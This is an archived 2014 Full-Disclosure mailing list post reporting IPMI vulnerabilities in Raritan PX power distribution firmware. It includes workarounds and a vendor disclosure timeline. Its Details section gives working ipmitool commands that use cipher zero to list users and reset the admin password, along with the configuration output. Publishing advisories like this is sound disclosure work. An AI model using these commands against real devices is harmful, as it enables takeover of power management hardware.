lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <trinity-f4f38573-dffc-41fe-a246-8dcc626ba37a-1404391875316@3capp-gmx-bs60>
Date: Thu, 3 Jul 2014 14:51:15 +0200
From: "Jörg Kost" <joerg.kost.fd@....eu>
To: fulldisclosure@...lists.org
Subject: [FD] Raritan IPMI vulnerability


 
Vulnerability:

Raritan PX power distribution software contains several well known IPMI vulnerabilities, e.g.
- ipmi zero cipher
- ipmi dump hash passwords   

Details:
E.g. Model DPXR20A-16:   
Software release all before and including 01.05.08 (recent version from october 2013)
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell ipmitool> user list
2 admin true false true OEM
ipmitool> user set password 2 foo
ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback :
: User : MD5
: Operator : MD5
: Admin : MD5
: OEM : MD5
IP Address Source : Unspecified IP Address : 17.XX.XX.XX
Subnet Mask : 255.255.255.224
MAC Address : 00:00:00:00:00:00
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Disabled Gratituous ARP Intrvl : 2.0 seconds
Default Gateway IP : 17.XX.XX.XX
Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0
Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,6,7,8,11,12 Cipher Suite Priv Max : uuuOXXuuOXXuOXX : X=Cipher Suite Unused
: c=CALLBACK
: u=USER
: o=OPERA TOR
: a=ADMIN
: O=OEM    
 
 
Workaround:
- Block IPMI Port 623
- Hang to management network only
- Don't use Raritan
 
Timeline: 
2014/02/19 - Contacted CERT, VR#HRS35Y8S  
2014/05/20 - Vendor claims its fixed but won't release new firmware to verify.
2014/07/03 - Vendor claims its fixed but still won't release new firmware to verify, neither won't send firmware to me.  
2014/07/03 - FD because lack of interest and time

Regards
Joerg

  
      

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ